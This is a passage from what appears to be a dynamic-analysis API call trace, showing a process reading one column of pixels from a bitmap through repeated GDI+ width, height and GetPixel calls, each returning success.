[0174.806] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.806] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=242, color=0x4de220) returned 0x0 [0174.807] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.807] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.807] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=243, color=0x4de220) returned 0x0 [0174.807] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.807] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.807] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=244, color=0x4de220) returned 0x0 [0174.807] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.807] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.807] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=245, color=0x4de220) returned 0x0 [0174.807] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.807] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.807] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=246, color=0x4de220) returned 0x0 [0174.807] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.807] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.807] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=247, color=0x4de220) returned 0x0 [0174.808] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.808] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.808] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=248, color=0x4de220) returned 0x0 [0174.808] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.808] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.808] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=249, color=0x4de220) returned 0x0 [0174.808] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.808] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.808] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=250, color=0x4de220) returned 0x0 [0174.808] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.808] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.808] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=251, color=0x4de220) returned 0x0 [0174.808] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.808] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.808] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=252, color=0x4de220) returned 0x0 [0174.808] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.808] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.808] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=253, color=0x4de220) returned 0x0 [0174.809] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.809] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.809] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=254, color=0x4de220) returned 0x0 [0174.809] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.809] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.809] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=255, color=0x4de220) returned 0x0 [0174.809] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.809] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.809] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=256, color=0x4de220) returned 0x0 [0174.809] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.809] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.809] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=257, color=0x4de220) returned 0x0 [0174.809] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.809] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.809] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=258, color=0x4de220) returned 0x0 [0174.809] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.809] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.809] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=259, color=0x4de220) returned 0x0 [0174.809] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.810] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.810] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=260, color=0x4de220) returned 0x0 [0174.810] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.810] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.810] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=261, color=0x4de220) returned 0x0 [0174.810] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.810] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.810] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=262, color=0x4de220) returned 0x0 [0174.810] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.810] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.810] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=263, color=0x4de220) returned 0x0 [0174.810] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.810] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.810] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=264, color=0x4de220) returned 0x0 [0174.810] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.810] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.810] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=265, color=0x4de220) returned 0x0 [0174.810] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.810] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.810] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=266, color=0x4de220) returned 0x0 [0174.811] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.811] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.811] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=267, color=0x4de220) returned 0x0 [0174.811] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.811] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.811] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=268, color=0x4de220) returned 0x0 [0174.811] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.811] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.811] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=269, color=0x4de220) returned 0x0 [0174.811] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.811] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.811] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=270, color=0x4de220) returned 0x0 [0174.811] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.811] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.811] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=271, color=0x4de220) returned 0x0 [0174.811] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.811] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.811] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=272, color=0x4de220) returned 0x0 [0174.812] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.812] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.812] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=273, color=0x4de220) returned 0x0 [0174.812] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.812] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.812] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=274, color=0x4de220) returned 0x0 [0174.812] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.812] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.812] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=275, color=0x4de220) returned 0x0 [0174.812] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.812] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.812] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=276, color=0x4de220) returned 0x0 [0174.812] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.812] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.812] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=277, color=0x4de220) returned 0x0 [0174.812] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.812] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.812] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=278, color=0x4de220) returned 0x0 [0174.812] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.812] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.812] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=279, color=0x4de220) returned 0x0 [0174.813] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.813] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.813] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=280, color=0x4de220) returned 0x0 [0174.813] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.813] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.813] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=281, color=0x4de220) returned 0x0 [0174.813] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.813] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.813] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=282, color=0x4de220) returned 0x0 [0174.813] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.813] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.813] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=283, color=0x4de220) returned 0x0 [0174.813] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.813] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.813] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=284, color=0x4de220) returned 0x0 [0174.813] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.813] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.813] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=285, color=0x4de220) returned 0x0 [0174.813] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.813] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.814] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=286, color=0x4de220) returned 0x0 [0174.814] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.814] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.814] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=287, color=0x4de220) returned 0x0 [0174.814] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.814] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.814] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=288, color=0x4de220) returned 0x0 [0174.814] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.814] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.814] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=289, color=0x4de220) returned 0x0 [0174.814] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.814] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.815] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=290, color=0x4de220) returned 0x0 [0174.815] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.815] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.815] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=291, color=0x4de220) returned 0x0 [0174.815] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.815] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.815] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=292, color=0x4de220) returned 0x0 [0174.815] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.815] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.815] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=293, color=0x4de220) returned 0x0 [0174.815] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.815] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.815] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=294, color=0x4de220) returned 0x0 [0174.815] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.815] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.815] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=295, color=0x4de220) returned 0x0 [0174.815] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.815] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.815] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=296, color=0x4de220) returned 0x0 [0174.815] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.815] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.815] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=297, color=0x4de220) returned 0x0 [0174.815] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.815] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.816] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=298, color=0x4de220) returned 0x0 [0174.816] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.816] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.816] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=299, color=0x4de220) returned 0x0 [0174.816] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.816] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.816] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=300, color=0x4de220) returned 0x0 [0174.816] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.816] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.816] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=301, color=0x4de220) returned 0x0 [0174.816] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.816] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.816] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=302, color=0x4de220) returned 0x0 [0174.816] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.816] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.816] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=303, color=0x4de220) returned 0x0 [0174.816] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.816] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.816] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=304, color=0x4de220) returned 0x0 [0174.816] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.816] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.816] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=305, color=0x4de220) returned 0x0 [0174.816] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.816] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.816] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=306, color=0x4de220) returned 0x0 [0174.817] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.817] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.817] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=307, color=0x4de220) returned 0x0 [0174.817] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.817] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.817] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=308, color=0x4de220) returned 0x0 [0174.817] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.817] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.817] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=309, color=0x4de220) returned 0x0 [0174.817] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.817] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.817] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=310, color=0x4de220) returned 0x0 [0174.817] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.817] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.817] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=311, color=0x4de220) returned 0x0 [0174.817] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.817] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.817] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=312, color=0x4de220) returned 0x0 [0174.817] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.817] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.817] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=313, color=0x4de220) returned 0x0 [0174.817] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.817] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.817] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=314, color=0x4de220) returned 0x0 [0174.818] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.818] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.818] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=315, color=0x4de220) returned 0x0 [0174.818] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.818] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.818] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=316, color=0x4de220) returned 0x0 [0174.818] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.818] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.818] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=317, color=0x4de220) returned 0x0 [0174.818] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.818] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.818] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=318, color=0x4de220) returned 0x0 [0174.818] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.818] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.818] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=319, color=0x4de220) returned 0x0 [0174.818] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.818] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.818] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=320, color=0x4de220) returned 0x0 [0174.818] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.818] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.818] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=321, color=0x4de220) returned 0x0 [0174.818] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.818] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.818] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=322, color=0x4de220) returned 0x0 [0174.818] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.819] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.819] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=323, color=0x4de220) returned 0x0 [0174.819] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.819] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.819] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=324, color=0x4de220) returned 0x0 [0174.819] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.819] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.819] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=325, color=0x4de220) returned 0x0 [0174.819] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.819] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.819] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=326, color=0x4de220) returned 0x0 [0174.819] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.819] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.819] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=327, color=0x4de220) returned 0x0 [0174.819] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.819] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.819] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=328, color=0x4de220) returned 0x0 [0174.819] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.819] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.819] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=329, color=0x4de220) returned 0x0 [0174.819] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.819] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.819] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=330, color=0x4de220) returned 0x0 [0174.819] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.819] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.820] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=331, color=0x4de220) returned 0x0 [0174.820] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.820] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.820] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=332, color=0x4de220) returned 0x0 [0174.820] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.820] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.820] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=333, color=0x4de220) returned 0x0 [0174.820] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.820] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.820] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=334, color=0x4de220) returned 0x0 [0174.820] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.820] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.820] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=335, color=0x4de220) returned 0x0 [0174.820] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.820] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.820] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=336, color=0x4de220) returned 0x0 [0174.820] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.820] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.820] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=337, color=0x4de220) returned 0x0 [0174.820] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.820] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.820] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=338, color=0x4de220) returned 0x0 [0174.820] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.820] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.820] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=339, color=0x4de220) returned 0x0 [0174.821] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.821] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.821] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=340, color=0x4de220) returned 0x0 [0174.821] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.821] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.821] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=341, color=0x4de220) returned 0x0 [0174.821] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.821] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.821] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=342, color=0x4de220) returned 0x0 [0174.821] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.821] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.821] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=343, color=0x4de220) returned 0x0 [0174.821] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.821] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.821] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=344, color=0x4de220) returned 0x0 [0174.821] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.821] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.821] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=345, color=0x4de220) returned 0x0 [0174.821] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.821] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.821] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=346, color=0x4de220) returned 0x0 [0174.821] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.821] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.821] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=347, color=0x4de220) returned 0x0 [0174.821] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.822] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.822] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=348, color=0x4de220) returned 0x0 [0174.822] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.822] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.822] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=349, color=0x4de220) returned 0x0 [0174.822] GdipGetImageWidth (image=0x57afcf0, 